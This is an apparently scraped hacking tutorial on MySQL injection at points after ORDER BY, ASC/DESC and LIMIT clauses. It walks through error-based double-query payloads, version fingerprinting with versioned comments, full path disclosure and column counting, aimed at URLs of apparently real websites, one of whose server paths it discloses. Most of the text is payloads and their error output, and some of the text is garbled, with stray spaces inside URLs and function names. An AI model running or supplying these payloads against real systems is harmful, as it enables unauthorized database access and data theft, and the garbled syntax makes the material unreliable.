This tut will give you instructions how to inject after order by/limit.
Like that
PHP Code: SELET * FROM page WHERE id = 1 order by id [here] ASC [here] LIMIT 10, 10 [here] here-injection point.
We cant use union after those clses, so we gonna play with the other things we can do.
After order by id [here]
Using double query.
If we have this site
Code: http://www.bkjia.com/include/products. php? Sb = idthe injection point is after order.
I know I can use union in another onjection point, I do it for the tut.
After order by its simple, the only things we cant use is-
Union, having, where, and some more things that dosent matter.
We can use 'and' for double query.
Code: http://www.teletec.com.pk/include/products.php? Sb = id and (select count (*) from products group by concat (version (), 0x27202020, floor (rand (0) * 2-1 ))) -- '5. 0.95-community'
(I used the table 'products' because I can see that this table exist from the error. if you cant see the table, use 'information _ schema. columns '.)
After desc/asc [here]
Using double query.
If we have this site
Code: http://www.teletec.com.pk/include/products.php? Sb = id desc 'the injection point is after desc.
After desc/asc its little more problem, because we cant use-
Union, having, where, and, or, xor, *,>, so we cant execute our query.
So we add a comma, and the double query after that.
Code: http://www.teletec.com.pk/include/products.php? Sb = id desc, (select count (*) from users group by concat (version (), 0x27202020, floor (rand (0) * 2-1 ))) '5. 0.95-community'
Note-if the injection point is like that-
PHP Code: SELECT * FROM page WHERE id = 1 order by [here] id just add '1' and inject like that first example.
Code: 1 and (select count (*) from products group by concat (version (), 0x27202020, floor (rand (0) * 2-1 )))--
After limit 10, 10 [here]
Using some tricks.
Like this site-
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 injetion point after limit clause.
When the injection point is after limit clause, we cant do anything, only those commands-
Offset, into, into outfile/dumpfile ,/*! */, For update, lock in share mode.
So we try to exploit what we can.
Toc-
Get the version
Full path disclosure
Find column count
Get the version (thanks to lolalu0)
We can use comments for getting the mysql version.
We can guess it, and if its true, the page will not load, just like blind, but different.
Code: http://www.bkjia.com/include/products. php? Rw = 10 /*! 50094aaaa */page dont load-version bigger then 5.00.94
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 /*! 50096aaaa */page load normally-version smaller than 5.00.96
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 /*! 50095aaaa */page dont load-version is 5.00.95.
FPD
For Full Path Disclosure, we can 0 or/**/the limit clause, and error with the full path will appear, even mysql_error is on.
For example
Code: http://www.teletec.com.pk/include/products.php? Rw = 0 final query-
PHP Code: select * from... limit 0, 0 and
We can also
Code: http://www.teletec.com.pk/include/products.php? Rw =/**/1 Warning: Division by zero in/home/teletec/public_html/include/products. php on line 164
Find the column count
Using.
Its not really will help, but its nice trick.
If we have this site-
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 injection point is after limit.
We can count the columns like that-
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 @
Error 1222.
Not 1 column.
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 @,@
Error 1222.
Not 2 column.
And so on-
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@, @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@, @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@, @,@
Error 1172 "Result consisted of more than one row ".
60 columns.
Hope you learned something
Author: just fuck it!
